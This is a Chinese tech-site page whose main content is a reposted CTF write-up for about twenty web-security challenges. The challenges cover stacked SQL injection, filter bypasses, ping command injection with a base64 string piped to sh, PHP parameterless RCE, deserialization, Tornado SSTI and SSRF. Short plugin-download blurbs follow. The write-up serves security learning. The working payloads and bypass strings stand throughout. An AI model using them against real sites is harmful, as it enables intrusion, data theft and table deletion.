前端技术
HTML
CSS
Javascript
前端框架和UI库
VUE
ReactJS
AngularJS
JQuery
NodeJS
JSON
Element-UI
Bootstrap
Material UI
服务端和客户端
Java
Python
PHP
Golang
Scala
Kotlin
Groovy
Ruby
Lua
.net
c#
c++
后端WEB和工程框架
SpringBoot
SpringCloud
Struts2
MyBatis
Hibernate
Tornado
Beego
Go-Spring
Go Gin
Go Iris
Dubbo
HessianRPC
Maven
Gradle
数据库
MySQL
Oracle
Mongo
中间件与web容器
Redis
MemCache
Etcd
Cassandra
Kafka
RabbitMQ
RocketMQ
ActiveMQ
Nacos
Consul
Tomcat
Nginx
Netty
大数据技术
Hive
Impala
ClickHouse
DorisDB
Greenplum
PostgreSQL
HBase
Kylin
Hadoop
Apache Pig
ZooKeeper
SeaTunnel
Sqoop
Datax
Flink
Spark
Mahout
数据搜索与日志
ElasticSearch
Apache Lucene
Apache Solr
Kibana
Logstash
数据可视化与OLAP
Apache Atlas
Superset
Saiku
Tesseract
系统与容器
Linux
Shell
Docker
Kubernetes
[前端开发中JSON数据的应用场景 ]的搜索结果
这里是文章列表。热门标签的颜色随机变换,标签颜色没有特殊含义。
点击某个标签可搜索标签相关的文章。
点击某个标签可搜索标签相关的文章。
转载文章
...!! 那么如何查询到数据呢? select 函数被过滤了,其实mysql的函数有很多 这里通过 MYSQL的预处理语句,使用 : concat('s','elect',' from 1919810931114514') 完成绕过 构造pyload: 1';PREPARE test from concat('s','elect',' from 1919810931114514');EXECUTE test; flag{3b3d8fa2-2348-4d6b-81af-017ca90e6c81} [SUCTF 2019]EasySQL 环境我已经启动了 进入题目链接 老套路 先看看源码里面有什么东西 不出意料的什么都没有 但是提示我们它是POST传参 这是一道SQL注入的题目 不管输入什么数字,字母 都是这的 没有回显 但是输入:0没有回显 不知道为啥 而且输入:1' 也不报错 同样是没有回显 尝试注入时 显示Nonono. 也就是说,没有回显,联合查询基本没戏。 好在页面会进行相应的变化,证明注入漏洞肯定是有的。 而且注入点就是这个POST参数框 看了大佬的WP 才想起来 还有堆叠注入 堆叠注入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为:(因未对输入的参数进行过滤)Select from products where productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。 1;show databases; 1;show tables; 1;use ctf;show tables; 跑字典时 发现了好多的过滤 哭了 没有办法… 看到上面主要是有两中返回,一种是空白,一种是nonono。 在网上查writeup看到 输入1显示:Array ( [0] => 1 )输入a显示:空白输入所有非0数字都显示:Array ( [0] => 1 )输入所有字母(除过滤的关键词外)都显示空白 可以推测题目应该是用了||符号。 推测出题目应该是select $_post[value] || flag from Flag。 这里 就有一个符号|| 当有一边为数字时 运算结果都为 true 返回1 使用 || 运算符,不在是做或运算 而是作为拼接字符串的作用 在oracle 缺省支持 通过 || 来实现字符串拼接,但在mysql 缺省不支持 需要调整mysql 的sql_mode 模式:pipes_as_concat 来实现oracle 的一些功能。 这个意思是在oracle中 || 是作为字符串拼接,而在mysql中是运算符。 当设置sql_mode为pipes_as_concat的时候,mysql也可以把 || 作为字符串拼接。 修改完后,|| 就会被认为是字符串拼接符 MySQL中sql_mode参数,具体的看这里 解题思路1: payload:,1 查询语句:select ,1||flag from Flag 解题思路2: 堆叠注入,使得sql_mode的值为PIPES_AS_CONCAT payload:1;set sql_mode=PIPES_AS_CONCAT;select 1 解析: 在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接。但在mysql 缺省不支持。需要调整mysql 的sql_mode模式:pipes_as_concat 来实现oracle 的一些功能。 flag出来了 头秃 不是很懂 看了好多的wp… [GYCTF2020]Blacklist 进入题目链接 1.注入:1’ 为'闭合 2.看字段:1' order by 2 确认字段为2 3.查看回显:1’ union select 1,2 发现过滤字符 与上面的随便注很像 ,太像了,增加了过滤规则。 修改表名和set均不可用,所以很直接的想到了handler语句。 4.但依旧可以用堆叠注入获取数据库名称、表名、字段。 1';show databases 获取数据库名称1';show tables 获取表名1';show columns from FlagHere ; 或 1';desc FlagHere; 获取字段名 5.接下来用 handler语句读取内容。 1';handler FlagHere open;handler FlagHere read first 直接得到 flag 成功解题。 flag{d0c147ad-1d03-4698-a71c-4fcda3060f17} 补充handler语句相关。 mysql除可使用select查询表中的数据,也可使用handler语句 这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不 具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中 [GKCTF2020]cve版签到 查看提示 菜鸡的第一步 提示了:cve-2020-7066 赶紧去查了一下 cve-2020-7066PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。攻击者可利用该漏洞造成信息泄露。 描述在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。 利用方法 总的来说也就是get_headers()可以被%00截断 进入题目链接 知识点: cve-2020-7066利用 老套路:先F12查看源码 发现提示:Flag in localhost 根据以上 直接上了 直接截断 因为提示host必须以123结尾,这个简单 所以需要将localhost替换为127.0.0.123 成功得到flag flag{bf1243d2-08dd-44ee-afe8-45f58e2d6801} GXYCTF2019禁止套娃 考点: .git源码泄露 无参RCE localeconv() 函数返回一包含本地数字及货币格式信息的数组。scandir() 列出 images 目录中的文件和目录。readfile() 输出一个文件。current() 返回数组中的当前单元, 默认取第一个值。pos() current() 的别名。next() 函数将内部指针指向数组中的下一个元素,并输出。array_reverse()以相反的元素顺序返回数组。highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。 具体细节,看这里 进入题目链接 上御剑扫目录 发现是.git源码泄露 上githack补全源码 得到源码 <?phpinclude "flag.php";echo "flag在哪里呢?<br>";if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦!");} }else{die("再好好想想!");} }else{die("还想读flag,臭弟弟!");} }// highlight_file(__FILE__);?> 既然getshell基本不可能,那么考虑读源码 看源码,flag应该就在flag.php 我们想办法读取 首先需要得到当前目录下的文件 scandir()函数可以扫描当前目录下的文件,例如: <?phpprint_r(scandir('.'));?> 那么问题就是如何构造scandir('.') 这里再看函数: localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是. current() 返回数组中的当前单元, 默认取第一个值。 pos() current() 的别名。 这里还有一个知识点: current(localeconv())永远都是个点 那么就很简单了 print_r(scandir(current(localeconv())));print_r(scandir(pos(localeconv()))); 第二步:读取flag所在的数组 之后我们利用array_reverse() 将数组内容反转一下,利用next()指向flag.php文件==>highlight_file()高亮输出 payload: ?exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); [De1CTF 2019]SSRF Me 首先得到提示 还有源码 进入题目链接 得到一串py 经过整理后 ! /usr/bin/env pythonencoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)secert_key = os.urandom(16)class Task:def __init__(self, action, param, sign, ip):python得构造方法self.action = actionself.param = paramself.sign = signself.sandbox = md5(ip)if(not os.path.exists(self.sandbox)): SandBox For Remote_Addros.mkdir(self.sandbox)def Exec(self):定义的命令执行函数,此处调用了scan这个自定义的函数result = {}result['code'] = 500if (self.checkSign()):if "scan" in self.action:action要写scantmpfile = open("./%s/result.txt" % self.sandbox, 'w')resp = scan(self.param) 此处是文件读取得注入点if (resp == "Connection Timeout"):result['data'] = respelse:print resp 输出结果tmpfile.write(resp)tmpfile.close()result['code'] = 200if "read" in self.action:action要加readf = open("./%s/result.txt" % self.sandbox, 'r')result['code'] = 200result['data'] = f.read()if result['code'] == 500:result['data'] = "Action Error"else:result['code'] = 500result['msg'] = "Sign Error"return resultdef checkSign(self):if (getSign(self.action, self.param) == self.sign): !!!校验return Trueelse:return Falsegenerate Sign For Action Scan.@app.route("/geneSign", methods=['GET', 'POST']) !!!这个路由用于测试def geneSign():param = urllib.unquote(request.args.get("param", "")) action = "scan"return getSign(action, param)@app.route('/De1ta',methods=['GET','POST'])这个路由是我萌得最终注入点def challenge():action = urllib.unquote(request.cookies.get("action"))param = urllib.unquote(request.args.get("param", ""))sign = urllib.unquote(request.cookies.get("sign"))ip = request.remote_addrif(waf(param)):return "No Hacker!!!!"task = Task(action, param, sign, ip)return json.dumps(task.Exec())@app.route('/')根目录路由,就是显示源代码得地方def index():return open("code.txt","r").read()def scan(param):这是用来扫目录得函数socket.setdefaulttimeout(1)try:return urllib.urlopen(param).read()[:50]except:return "Connection Timeout"def getSign(action, param):!!!这个应该是本题关键点,此处注意顺序先是param后是actionreturn hashlib.md5(secert_key + param + action).hexdigest()def md5(content):return hashlib.md5(content).hexdigest()def waf(param):这个waf比较没用好像check=param.strip().lower()if check.startswith("gopher") or check.startswith("file"):return Trueelse:return Falseif __name__ == '__main__':app.debug = Falseapp.run(host='0.0.0.0') 相关函数 作用 init(self, action, param, …) 构造方法self代表对象,其他是对象的属性 request.args.get(param) 提取get方法传入的,参数名叫param对应得值 request.cookies.get(“action”) 提取cookie信息中的,名为action得对应值 hashlib.md5().hexdigest() hashlib.md5()获取一个md5加密算法对象,hexdigest()是获得加密后的16进制字符串 urllib.unquote() 将url编码解码 urllib.urlopen() 读取网络文件参数可以是url json.dumps Python 对象编码成 JSON 字符串 这个题先放一下… [极客大挑战 2019]EasySQL 进入题目链接 直接上万能密码 用户随意 admin1' or 1; 得到flag flag{7fc65eb6-985b-494a-8225-de3101a78e89} [极客大挑战 2019]Havefun 进入题目链接 老套路 去F12看看有什么东西 很好 逮住了 获取FLAG的条件是cat=dog,且是get传参 flag就出来了 flag{779b8bac-2d64-4540-b830-1972d70a2db9} [极客大挑战 2019]Secret File 进入题目链接 老套路 先F12查看 发现超链接 直接逮住 既然已经查阅结束了 中间就肯定有一些我们不知道的东西 过去了 上burp看看情况 我们让他挺住 逮住了:secr3t.php 访问一下 简单的绕过 就可以了 成功得到一串字符 进行base解密即可 成功逮住flag flag{ed90509e-d2d1-4161-ae99-74cd27d90ed7} [ACTF2020 新生赛]Include 根据题目信息 是文件包含无疑了 直接点击进来 用php伪协议 绕过就可以了 得到一串编码 base64解密即可 得到flag flag{c09e6921-0c0e-487e-87c9-0937708a78d7} 2018]easy_tornado 都点击一遍 康康 直接filename变量改为:fllllllllllllag 报错了 有提示 render() 是一个渲染函数 具体看这里 就用到SSTI模板注入了 具体看这里 尝试模板注入: /error?msg={ {1} } 发现存在模板注入 md5(cookie_secret+md5(filename)) 分析题目: 1.tornado是一个python的模板,可能会产生SSTI注入漏洞2.flag在/fllllllllllllag中3.render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页4.可以推断出filehash的值为md5(cookie_secret+md5(filename)) 根据目前信息,想要得到flag就需要获取cookie_secret 因为tornado存在模版注入漏洞,尝试通过此漏洞获取到所需内容 根据测试页面修改msg得值发现返回值 可以通过msg的值进行修改,而在 taornado框架中存在cookie_secreat 可以通过/error?msg={ {handler.settings} }拿到secreat_cookie 综合以上结果 拿脚本跑一下 得到filehash: ed75a45308da42d3fe98a8f15a2ad36a 一直跑不出来 不知道为啥子 [极客大挑战 2019]LoveSQL 万能密码尝试 直接上万能密码 用户随意 admin1' or 1; 开始正常注入: 查字段:1' order by 3 经过测试 字段为3 查看回显:1’ union select 1,2,3 查数据库 1' union select 1,2,group_concat(schema_name) from information_schema.schemata 查表: [GXYCTF2019]Ping Ping Ping 考察:RCE的防护绕过 直接构造:?ip=127.0.0.1;ls 简单的fuzz一下 就发现=和$没有过滤 所以想到的思路就是使用$IFS$9代替空格,使用拼接变量来拼接出Flag字符串: 构造playload ?ip=127.0.0.1;a=fl;b=ag;cat$IFS$9$a$b 看看他到底过滤了什么:?ip=127.0.0.1;cat$IFS$1index.php 一目了然过滤了啥,flag字眼也过滤了,bash也没了,不过sh没过滤: 继续构造payload: ?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 查看源码,得到flag flag{1fe312b4-96a0-492d-9b97-040c7e333c1a} [RoarCTF 2019]Easy Calc 进入题目链接 查看源码 发现calc.php 利用PHP的字符串解析特性Bypass,具体看这里 HP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1.删除空白符2.将某些字符转换为下划线(包括空格) scandir():列出参数目录中的文件和目录 发现/被过滤了 ,可以用chr('47')代替 calc.php? num=1;var_dump(scandir(chr(47))) 这里直接上playload calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) flag{76243df6-aecb-4dc5-879e-3964ec7485ee} [极客大挑战 2019]Knife 进入题目链接 根据题目Knife 还有这个一句话木马 猜想尝试用蚁剑连接 测试连接成功 确实是白给了flag [ACTF2020 新生赛]Exec 直接ping 发现有回显 构造playload: 127.0.0.1;cat /flag 成功拿下flag flag{7e582f16-2676-42fa-8b9d-f9d7584096a6} [极客大挑战 2019]PHP 进入题目链接 它提到了备份文件 就肯定是扫目录 把源文件的代码 搞出来 上dirsearch 下载看这里 很简单的使用方法 用来扫目录 -u 指定url -e 指定网站语言 -w 可以加上自己的字典,要带路径 -r 递归跑(查到一个目录后,重复跑) 打开index.php文件 分析这段内容 1.加载了一个class.php文件 2.采用get方式传递一个select参数 3.随后将之反序列化 打开class.php <?phpinclude 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();} }}?> 根据代码的意思可以知道,如果password=100,username=admin 在执行_destruct()的时候可以获得flag 构造序列化 <?phpclass Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;} }$a = new Name('admin', 100);var_dump(serialize($a));?> 得到了序列化 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;} 但是 还有要求 1.跳过__wakeup()函数 在反序列化字符串时,属性个数的值大于实际属性个数时,就可以 2.private修饰符的问题 private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度 构造最终的playload ?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;} [极客大挑战 2019]Http 进入题目链接 查看 源码 发现了 超链接的标签 说我们不是从https://www.Sycsecret.com访问的 进入http://node3.buuoj.cn:27883/Secret.php 抓包修改一下Referer 执行一下 随后提示我们浏览器需要使用Syclover, 修改一下User-Agent的内容 就拿到flag了 [HCTF 2018]admin 进入题目链接 这道题有三种解法 1.flask session 伪造 2.unicode欺骗 3.条件竞争 发现 登录和注册功能 随意注册一个账号啦 登录进来之后 登录 之后 查看源码 发现提示 猜测 我们登录 admin账号 即可看见flag 在change password页面发现 访问后 取得源码 第一种方法: flask session 伪造 具体,看这里 flask中session是存储在客户端cookie中的,也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是,签名的作用是防篡改,而无法防止被读取。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的,这就可能造成一些安全问题。 [极客大挑战 2019]BabySQL 进入题目链接 对用户名进行测试 发现有一些关键字被过滤掉了 猜测后端使用replace()函数过滤 11' oorr 1=1 直接尝试双写 万能密码尝试 双写 可以绕过 查看回显: 1' uniunionon selselectect 1,2,3 over!正常 开始注入 爆库 爆列 爆表 爆内容 本篇文章为转载内容。原文链接:https://blog.csdn.net/wo41ge/article/details/109162753。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-11-13 21:30:33
303
转载
建站模板下载
...保科技废弃物污染治理前端模板”是一款专注于环保科技领域的专业网站模板,设计风格大气且简洁,适用于废弃物污染治理、水体污染等相关企业或项目展示。模板以突出环保科技为核心,强调废弃物污染治理的前沿技术和实践成果。用户可便捷下载并应用于前端开发中,快速构建展现环保理念与科技成果的专业化网站平台。 点我下载 文件大小:15.19 MB 您将下载一个资源包,该资源包内部文件的目录结构如下: 本网站提供模板下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-04-23 16:29:43
338
本站
建站模板下载
资源介绍 这款“带数据大型工业机械设备类前端模板”专为机械制造、铸造设备等行业打造,设计上充分考虑了企业通用需求。该模板具备前端自适应功能,能够根据访问设备自动调整布局,完美适配PC端及手机端浏览体验。其深度兼容Dedecms系统,方便进行二次开发,前端与后台结构清晰,大大简化了网站管理和维护工作。特别适用于工业机械产品的展示和推广,配备前端CMS系统,助力企业高效构建专业且极具吸引力的官方网站。 点我下载 文件大小:11.67 MB 您将下载一个资源包,该资源包内部文件的目录结构如下: 本网站提供模板下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-04-24 09:27:57
85
本站
JQuery插件下载
...port是一款强大的前端插件,专门设计用于将网页上普通HTML表格的数据内容便捷地导出为多种常见格式。通过集成此插件,开发者能够赋予用户将表格数据一键转换成CSV、XLS(Excel)、TXT或SQL文件的功能。该插件基于jQuery库构建,易于集成到现有项目中,并且提供了高度的灵活性和可定制性。使用者无需复杂的编程操作,只需简单调用API,即可实现对表格数据的灵活导出配置,如设置分隔符、忽略特定列等。这一特性使得jQuery-tableExport成为报表生成、数据分析及数据迁移场景下不可或缺的工具,极大地提升了用户体验和数据处理效率。 点我下载 文件大小:47.78 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2024-01-01 20:21:15
133
本站
JQuery插件下载
...置和大量的编程工作,开发者只需引用并调用该插件,即可快速为网站添加独特的背景滚动动画。无论是全屏背景还是局部容器背景,都能够运用这一特效实现仿佛三维空间般的视觉变换。同时,其兼容性和易用性也使得这款插件成为网页设计师和前端开发者的理想选择,以较低的成本打造出令人印象深刻的沉浸式网页浏览环境。 点我下载 文件大小:130.98 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-02-22 16:34:18
110
本站
JQuery插件下载
...网页交互体验而设计的前端开发工具。它巧妙地结合了jQuery强大的JavaScript库与CSS3的先进动画特性,赋予超链接在鼠标悬停时丰富的动态效果。当用户将鼠标光标停留在超链接文字上时,该插件能够即时触发多达6种独特且炫酷的动画特效,从而吸引用户的注意力并增强页面的视觉吸引力。这些特效不仅限于简单的颜色变化或阴影处理,而是通过精妙的动画过渡实现深层次的视觉反馈,例如旋转、缩放、位移以及渐变等效果。开发者可以便捷地集成此插件到项目中,轻松定制符合网站风格的超链接悬停表现,为用户带来新颖且流畅的互动感受,同时也有助于提升整体网站的专业性和用户体验。 点我下载 文件大小:229.91 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-01-20 16:50:01
109
本站
JQuery插件下载
...缩小特效插件。它专为前端开发者设计,无需依赖jQuery或其他外部库,仅凭纯JavaScript技术实现图片和其他HTML元素的动态放大和缩小功能。此插件的强大之处在于其灵活性,用户只需在目标元素上添加特定的类,如"zoomable"或"zoomerang-target",即可激活其交互性。当用户点击这样的元素时,Zoomerang.js会让元素以中心对齐的方式放大,提供清晰的细节查看体验。放大后的视图可以在用户交互下保持聚焦,直到再次点击,这时元素会恢复到原始大小和位置,操作流畅自然。这种功能特别适合在产品展示、地图导航或者需要高精度查看的网页场景中使用,提升了用户体验和信息的可访问性。由于其简洁的实现方式,它对于性能影响较小,非常适合对性能有较高要求的现代Web应用。 点我下载 文件大小:22.78 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2024-06-14 20:31:01
125
本站
JQuery插件下载
...vaScript技术开发的轻量级浏览器插件,专为网站留言板块设计。它模仿了腾讯微博的经典无刷新交互体验,使得用户在无需页面重载的情况下就能完成留言发布和删除操作。通过精简高效的代码实现(仅200多行),此插件极大地提升了用户体验与网页动态响应速度。使用这款插件的网站能够提供流畅的留言互动服务,用户输入留言内容后,只需点击发布按钮,即可通过Ajax异步请求将数据提交至服务器,并在前端页面实时展现新增的留言内容。同时,对于已发布的留言,用户可以执行删除操作,同样采用无刷新技术,让整个界面保持连贯性,避免了传统网页跳转带来的割裂感。总之,这款插件凭借其简洁易用的API及高度仿真的腾讯微博风格无刷新特性,成为提升网站用户互动性和留存率的理想工具之一。 点我下载 文件大小:73.98 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2024-01-19 23:06:52
58
本站
JQuery插件下载
...是一款专门针对Web前端开发的动画工具,它基于jQuery库构建,设计灵感来源于Google提出的MaterialDesign设计理念。该插件的核心功能在于实现元素在页面上的分层与动态过渡效果,允许开发者轻松地为网页中的任何元素(如:卡片、菜单、列表项等)设置从起始点A平滑过渡到目标点B的动画效果。通过这款插件,可以增强用户界面的互动性和视觉吸引力,遵循MaterialDesign规范中强调的空间关系和运动规律,使元素在空间变换时具备自然且符合物理规则的动效。开发者只需简单配置,即可让页面元素的出现、消失或位置改变拥有如同原生MaterialDesign应用般的高质量动画表现,从而提升整体用户体验和UI的专业感。 点我下载 文件大小:229.86 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-11-15 10:12:28
99
本站
JQuery插件下载
...emock是一款专为开发者和设计师打造的jQuery插件,它能够轻松在浏览器中模拟生成各种桌面设备和移动设备模型。通过这款插件,用户可以灵活模拟iPhone、iPad、Android手机和平板、桌面显示器等多种设备类型,并且可以根据实际需求精确设置每个设备模型的屏幕尺寸大小以及颜色模式,实现高度逼真的界面预览效果。在进行响应式网站或应用开发时,devicemock提供了一种便捷的方式来测试不同设备下的布局适应性和视觉表现,无需实际拥有所有类型的物理设备。只需简单调用该插件及其相关API,即可快速渲染出目标设备的框架结构,极大地提高了设计调试阶段的工作效率与准确性。总之,devicemock作为一个实用的jQuery工具,是前端开发过程中不可或缺的一部分,帮助开发者确保项目在多种设备环境下都能呈现出理想的用户体验。 点我下载 文件大小:156.16 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-02-28 19:03:32
94
本站
JQuery插件下载
...egment.js,开发者可以轻松地将任何select控件转化为具有流畅切换效果和精美视觉表现的分段按钮,实现与iOS系统的无缝对接。这款插件极大地简化了跨平台UI统一化的工作流程,让网页设计师和前端开发人员能够专注于创造更佳的用户体验,同时保持页面风格与时俱进。只需简单的调用与配置,即使是非iOS平台的访问者也能享受到类似Apple设备的高端、一体化的界面交互效果。 点我下载 文件大小:42.88 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-10-22 12:24:26
58
本站
JQuery插件下载
...pDown是一款专为前端开发者设计的jQuery插件,旨在提升网页表单中下拉菜单的视觉体验。这款插件的主要功能在于美化select元素,使其不仅在功能上更加完善,同时在视觉上也更具吸引力。通过ImageDropDown,你可以轻松地为select下拉菜单中的每一个选项添加小图标,这不仅能帮助用户更快地识别不同的选项,还能显著增强页面的整体美观度。此外,该插件提供了丰富的定制化选项,允许开发者调整下拉菜单的样式和布局,以适应不同网站的设计风格。无论是简洁现代的扁平化设计,还是复古经典的风格,ImageDropDown都能灵活应对,确保下拉菜单与整个页面和谐统一。使用此插件,你无需编写复杂的CSS代码或JavaScript脚本,即可实现专业的视觉效果,大大简化了前端开发的工作流程。总之,ImageDropDown是那些希望在不牺牲用户体验的前提下提升网页美观度的开发者的理想选择。无论是个人项目还是企业级应用,这款插件都能提供强大的支持,帮助你的网站脱颖而出。 点我下载 文件大小:176.16 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2024-10-27 11:18:00
26
本站
JQuery插件下载
...是一款专为网页设计和前端开发人员打造的动态文本效果工具。它利用jQuery强大的JavaScript库,为用户提供了丰富多样的波浪文字动画特效,总计包含十款不同风格的动画效果,每一种都能赋予网页中的文字独特的视觉冲击力和艺术表现力。该插件以其简洁易用而著称,开发者只需通过简单的集成与调用,即可在各类主流浏览器(如Chrome、Firefox、Safari、Edge以及国内的搜狗、360等浏览器)中实现高度兼容且流畅的波浪文字动画展示。无论是网页标题、滚动新闻,还是创意广告文案,都能够通过此插件呈现出炫酷的波浪形变、起伏波动等动态视觉体验,极大地提升了网站内容的表现力与吸引力。总之,“10种超酷波浪文字动画特效jquery插件”是增强网页交互性和创新设计的理想选择,凭借其多样化的动画特效及易于使用的特性,能够帮助开发者轻松打造出令人耳目一新的网页文字动态效果。 点我下载 文件大小:73.53 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-02-10 16:08:37
115
本站
JQuery插件下载
